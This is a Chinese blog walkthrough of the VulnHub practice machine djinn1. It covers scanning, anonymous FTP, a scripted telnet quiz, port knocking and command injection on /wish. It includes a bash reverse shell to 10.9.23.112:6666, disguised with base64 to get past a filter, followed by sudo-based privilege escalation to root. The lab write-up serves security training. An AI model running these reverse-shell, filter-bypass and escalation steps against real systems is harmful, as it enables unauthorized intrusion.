首页 > 其他分享 >vulnhub靶机:djinn1

vulnhub靶机:djinn1

时间:2024-03-19 15:14:41浏览次数:27  
标签:10.9 res nc 端口 djinn1 23.212 vulnhub strip 靶机

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机IP

10.9.23.212

2:端口扫描

nmap -A -p- -T4 10.9.23.212

  • ftp允许匿名登录
  • 扫描ssh时被过滤了
  • 1337不知道是个什么端口
  • 7331端口是个 python环境的 web服务

3:端口探测

1:ftp端口

ftp 10.9.23.212

anonymous

查看文件

nitu:81299

nitish81299

2:1337端口

此端口运行的是telnet服务,用nc连接了一下,得到提示,连续正确回答问题1000次,会得到一个礼物。

nc -vv 10.9.23.212 1337

利用网上找到的脚本

coding:utf-8

import logging
import telnetlib
import time
import re

def main():
try:
tn = telnetlib.Telnet('10.9.23.212', port=1337)
except:
logging.warning("errr")
time.sleep(0.5)
loop = 1
while loop < 1002:
data = tn.read_very_eager().decode('ascii')
print(data)
res = re.search('(.*?)\s>', data).group(1)
datas = str(calc(res)).strip()
print(str(loop) + ":" + datas)
loop = loop + 1
tn.write(datas.encode('ascii') + b"\n")
time.sleep(0.1)
data = tn.read_very_eager().decode('ascii')
return data

def calc(res):
res_str = res.strip('(').strip(")").replace("'", "")
muns = res_str.split(',')
munber1 = muns[0].strip()
orperator = muns[1].strip()
munber2 = muns[2].strip()
res = eval(munber1 + orperator + munber2)
return res

print(main())

python 1.py运行脚本

1356, 6784, 3409

因为ssh是过滤的,联想到这三个数字可能是端口敲门的端口,用nc测试连接

nc 10.9.23.212 1356
nc 10.9.23.212 6784
nc 10.9.23.212 3409

nmap -p 22 10.9.23.212

也可以直接开启

knock 10.9.23.212 1356 6784 3409

3:7331端口

4:目录遍历

gobuster dir -u http://10.9.23.212:7331/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100

/genie

/wish

访问/wish目录,看起来像是命令执行,测试一下,一旦执行下面的命令,页面会跳转,并通过审查元素可以定位出命令执行结果

二:渗透测试

1:反弹shell

bp抓包

反弹shell

bash -i >& /dev/tcp/10.9.23.212/6666 0>&1

被拦截了,尝试base64编码绕过

在kali里输入

└─# echo "bash -i &> /dev/tcp/10.9.23.112/6666 0>&1"|base64

在burp中输入

echo YmFzaCAtaSAmPiAvZGV2L3RjcC8xMC45LjIzLjExMi82NjY2IDA+JjEK | base64 -d | bash


按Ctrl+U,编码快捷键

反弹成功

2:提权

在 nitish 的家目录下发现了 nitish 的密码

nitish:p4ssw0rdStr3r0n9

su进行切换,并获得第一个user.txt

切换为pythonshell,这里不切换的话,不能使用su切换用户。

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看sudo权限

这里genie命令可以使用sam的身份进行运行,而且无需passwd

使用sam的身份运行id,成功的切换为sam

sudo -u sam genie -cmd id

再次查看sudo权限

sudo -l

发现lago命令可以用root的身份运行,并且不需要passwd

sudo -u root /root/lago

输入num则会运行system('/bin/sh')

若是用root的身份运行system('/bin/sh')那么就会得到一个root的shell

标签:10.9,res,nc,端口,djinn1,23.212,vulnhub,strip,靶机
From: https://www.cnblogs.com/woaishuaidan/p/18082867

相关文章

  • buuctf靶机笔记3
    BUUXSSCOURSE首页如此显然是持久性xss将数据存储到后台管理员访问后台触发xss后可以盗取cookie对后台进行登录但我们还不知道后台地址先尝试:<script>alert(1)</script>提交成功尝试访问没有触发弹窗可能后台存在过滤尝试用img标签:<imgsrc='11'onerror=alert(11......
  • vulnhub靶机:dc-8
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机ip10.9.23.742:端口扫描nmap-A-p--T410.9.23.743:端口探测4:目录遍历dirbhttp://10.9.23.74http://10.9.23.74/robots.txt发现有登录界面地址,访问一下:/?q=user/login/发现可能存在sql注入二:渗透测......
  • vulnhub靶机:dc-7
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.1572:端口扫描nmap-A-p--T410.9.23.1573:端口探测给的提示去搜索一下@DC7USER发现是github的一些代码,下载进行查看在config.php配置文件里发现了用户名和密码$username="dc7user";$passwo......
  • Vulnhub之DarkHole_1
    DarkHole_1一信息收集IP扫描端口扫描访问80目录扫描查看目录80网页-->login注册用户我的id是2,那么应该有个账号是id=1,尝试越权修改id=1的密码把id改为1发现登陆成功,多了一个上传文件的地方,前面的目录扫描中我们也发现了/upload路径,尝试上传反弹shell上传一句话木......
  • vulnhub靶机:dc-6
    一:信息收集1:主机发现靶机IP10.9.23.1302:端口扫描nmap-A-p--T410.9.23.1303:端口探测访问失败,返回wordy的域名,在添加hosts文件:访问成功后发现和dc2长的很像用的是wordpress,用wpscan试一下wpscan--urlhttp://wordy/-eu扫出来五个用户名adminmarkgraham......
  • BUUCTF靶机笔记
    BUUBRUTE11启动靶机后可以看到是一个登陆页面查看源代码:没有有用的信息只是单纯的html页面随便填一个用户:admin密码:123提示密码为四位怀疑是暴力破解使用burp进行单点爆破payload设定暴力完成查看length不同的数据包返回flag:flag{6982d5b6-a2f8-48d8-aec6......
  • vulnhub靶机:dc-5
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机IP10.9.23.2042:端口扫描nmap-A-p--T410.9.23.2043:端口探测发现contact里面他有输入框发现底下这个页脚会发生变化,猜测存在文件包含漏洞,先扫一下目录4:目录遍历dirsearch-u10.9.23......
  • Vulnhub内网渗透Jangow01靶场通关
    详细请见个人博客靶场下载地址。下载下来后是.vmdk格式,vm直接导入。M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此信息搜集arp-scan-l #主机发现ip为192.168.168.15nmap-sV-A-p-192.168.168.15 #端口扫描发现开放了21ftp和80http端口,对......
  • vulnhub靶机:dc4
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.9.23.522:端口扫描nmap-A-p--T410.9.23.523:端口探测二:渗透测试1:密码爆破尝试九头蛇进行爆破构建语句:hydra-ladmin-Ppass.txt10.9.23.52http-post-form"/login.php:us......
  • vulnhub靶机:dc3
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.4.9.23.2432:端口扫描nmap-A-p--T410.9.23.2433:端口探测提示要获取root权限4:目录遍历查看Wapplayzer信息:使用的Joomla系统,所以使用joomscan(Joomla漏洞扫描器)扫描器扫描:joom......